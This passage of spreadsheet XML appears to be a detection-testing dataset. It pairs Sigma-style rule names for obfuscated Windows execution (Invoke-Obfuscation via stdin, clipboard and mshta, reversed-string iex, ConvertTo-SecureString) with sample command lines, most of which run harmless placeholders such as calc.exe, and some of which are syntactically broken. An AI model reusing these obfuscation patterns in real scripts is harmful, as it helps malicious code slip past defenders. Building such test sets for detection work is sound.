      <c r="F3626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3626" s="43" t="n"/>
      <c r="J3626" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3626" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3627" ht="15.75" customHeight="1" s="42">
      <c r="A3627" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3627" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C3627" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D3627" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E3627" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "$d = New-Object System.IO.Compression.DeflateStream($s, 0); $r = New-Object System.IO.StreamReader($d, [System.Text.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F3627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3627" s="43" t="n"/>
      <c r="J3627" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3627" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3628" ht="15.75" customHeight="1" s="42">
      <c r="A3628" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3628" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C3628" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D3628" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E3628" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = New-Object System.IO.Compression.DeflateStream($s, 0); $r = New-Object System.IO.StreamReader($d, [System.Text.Encoding]::GetEncoding('ASCII')); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F3628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3628" s="43" t="n"/>
      <c r="J3628" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3628" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3629" ht="15.75" customHeight="1" s="42">
      <c r="A3629" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3629" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C3629" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D3629" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E3629" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = New-Object System.IO.Compression.DeflateStream($s, 0); $r = New-Object System.IO.StreamReader($d, [System.Text.Encoding]::ASCII); &amp; { $r.ReadToEnd() }"</t>
        </is>
      </c>
      <c r="F3629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3629" s="43" t="n"/>
      <c r="J3629" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3629" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3630" ht="15.75" customHeight="1" s="42">
      <c r="A3630" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3630" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3630" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3630" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3630" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /C "set a=in&amp;&amp; set b=voke&amp;&amp; set c=!a!!b!&amp;&amp; echo !c! | powershell -"</t>
        </is>
      </c>
      <c r="F3630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3630" s="43" t="n"/>
      <c r="J3630" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3630" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3631" ht="15.75" customHeight="1" s="42">
      <c r="A3631" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3631" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3631" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3631" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3631" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3631" s="43" t="n"/>
      <c r="J3631" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3631" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3632" ht="15.75" customHeight="1" s="42">
      <c r="A3632" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3632" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3632" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3632" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3632" s="43" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -c "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3632" s="43" t="n"/>
      <c r="J3632" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3632" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3633" ht="15.75" customHeight="1" s="42">
      <c r="A3633" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3633" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C3633" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D3633" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E3633" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F3633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3633" s="43" t="n"/>
      <c r="J3633" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3633" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3634" ht="15.75" customHeight="1" s="42">
      <c r="A3634" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3634" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C3634" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D3634" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E3634" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host 'Bypass Test' | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F3634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3634" s="43" t="n"/>
      <c r="J3634" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3634" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3635" ht="15.75" customHeight="1" s="42">
      <c r="A3635" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3635" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C3635" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D3635" s="43" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E3635" s="43" t="inlineStr">
        <is>
          <t>mshta vbscript:CreateObject("WScript.Shell").Run("calc.exe",0)(window.close)</t>
        </is>
      </c>
      <c r="F3635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3635" s="43" t="n"/>
      <c r="J3635" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3635" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3636" ht="15.75" customHeight="1" s="42">
      <c r="A3636" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3636" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C3636" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D3636" s="43" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E3636" s="43" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp; mshta vbscript:CreateObject("WScript.Shell").Exec("%a%")(window.close)</t>
        </is>
      </c>
      <c r="F3636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3636" s="43" t="n"/>
      <c r="J3636" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3636" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3637" ht="15.75" customHeight="1" s="42">
      <c r="A3637" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3637" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C3637" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D3637" s="43" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E3637" s="43" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp;&amp; mshta javascript:a=new ActiveXObject("WScript.Shell");a.Run("%a%"),window.close();</t>
        </is>
      </c>
      <c r="F3637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3637" s="43" t="n"/>
      <c r="J3637" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3637" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3638" ht="15.75" customHeight="1" s="42">
      <c r="A3638" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3638" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C3638" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D3638" s="43" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E3638" s="43" t="inlineStr">
        <is>
          <t>set a=1 &amp;&amp; m^shta vbscript:createobject("WScript.Shell").run("calc.exe")(window.close)</t>
        </is>
      </c>
      <c r="F3638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3638" s="43" t="n"/>
      <c r="J3638" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3638" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3639" ht="15.75" customHeight="1" s="42">
      <c r="A3639" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3639" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C3639" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D3639" s="43" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E3639" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set PAYLOAD=Write-Host 'Benign Educational Bypass' &amp; set LAUNCH=powershell.exe -NoP -c \"{1}{0}\" -f 'st','Te' &amp; %LAUNCH%"</t>
        </is>
      </c>
      <c r="F3639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3639" s="43" t="n"/>
      <c r="J3639" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3639" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3640" ht="15.75" customHeight="1" s="42">
      <c r="A3640" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3640" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C3640" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D3640" s="43" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E3640" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set VAR=Invoke-Expression 'Write-Host Safe' &amp;&amp;set RUN=powershell.exe -c (\'Te\'+\'st\') &amp;&amp; %RUN%"</t>
        </is>
      </c>
      <c r="F3640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3640" s="43" t="n"/>
      <c r="J3640" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3640" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3641" ht="15.75" customHeight="1" s="42">
      <c r="A3641" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3641" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3641" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3641" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3641" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {function C2SS { ConvertTo-SecureString -String 'MySecret' -AsPlainText -Force }; C2SS }"</t>
        </is>
      </c>
      <c r="F3641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3641" s="43" t="n"/>
      <c r="J3641" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3641" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3642" ht="15.75" customHeight="1" s="42">
      <c r="A3642" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3642" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3642" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3642" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3642" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'ConvertTo-SecureString'; &amp; $cmd -String 'MySecret' -AsPlainText -Force }"</t>
        </is>
      </c>
      <c r="F3642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3642" s="43" t="n"/>
      <c r="J3642" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3642" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3643" ht="15.75" customHeight="1" s="42">
      <c r="A3643" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3643" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3643" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3643" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3643" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $s = 'MySecret'; ConvertTo-SecureString -String $s -AsPlainText -Force }"</t>
        </is>
      </c>
      <c r="F3643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3643" s="43" t="n"/>
      <c r="J3643" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3643" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3644" ht="15.75" customHeight="1" s="42">
      <c r="A3644" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3644" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3644" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3644" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3644" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'ConvertTo-'; $cmd += 'SecureString'; &amp; $cmd -String 'MySecret' -AsPlainText -Force }"</t>
        </is>
      </c>
      <c r="F3644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3644" s="43" t="n"/>
      <c r="J3644" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3644" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3645" ht="15.75" customHeight="1" s="42">
      <c r="A3645" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3645" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3645" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3645" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3645" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$s = 'tpircS'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3645" s="43" t="n"/>
      <c r="J3645" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3645" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3646" ht="15.75" customHeight="1" s="42">
      <c r="A3646" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3646" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3646" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3646" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3646" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'hctac'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3646" s="43" t="n"/>
      <c r="J3646" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3646" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3647" ht="15.75" customHeight="1" s="42">
      <c r="A3647" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3647" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3647" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3647" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3647" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'kaerb'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3647" s="43" t="n"/>
      <c r="J3647" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3647" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3648" ht="15.75" customHeight="1" s="42">
      <c r="A3648" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3648" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3648" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3648" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3648" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'dnammoc'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3648" s="43" t="n"/>
      <c r="J3648" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3648" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3649" ht="15.75" customHeight="1" s="42">
      <c r="A3649" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3649" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3649" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3649" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3649" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'ekovn'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3649" s="43" t="n"/>
      <c r="J3649" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3649" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3650" ht="15.75" customHeight="1" s="42">
      <c r="A3650" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3650" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3650" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3650" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3650" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'rahc'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3650" s="43" t="n"/>
      <c r="J3650" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3650" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3651" ht="15.75" customHeight="1" s="42">
      <c r="A3651" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3651" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3651" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3651" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3651" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'etirw'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3651" s="43" t="n"/>
      <c r="J3651" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3651" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3652" ht="15.75" customHeight="1" s="42">
      <c r="A3652" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3652" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3652" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3652" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3652" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'golon'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F3652" s="43" t="b">
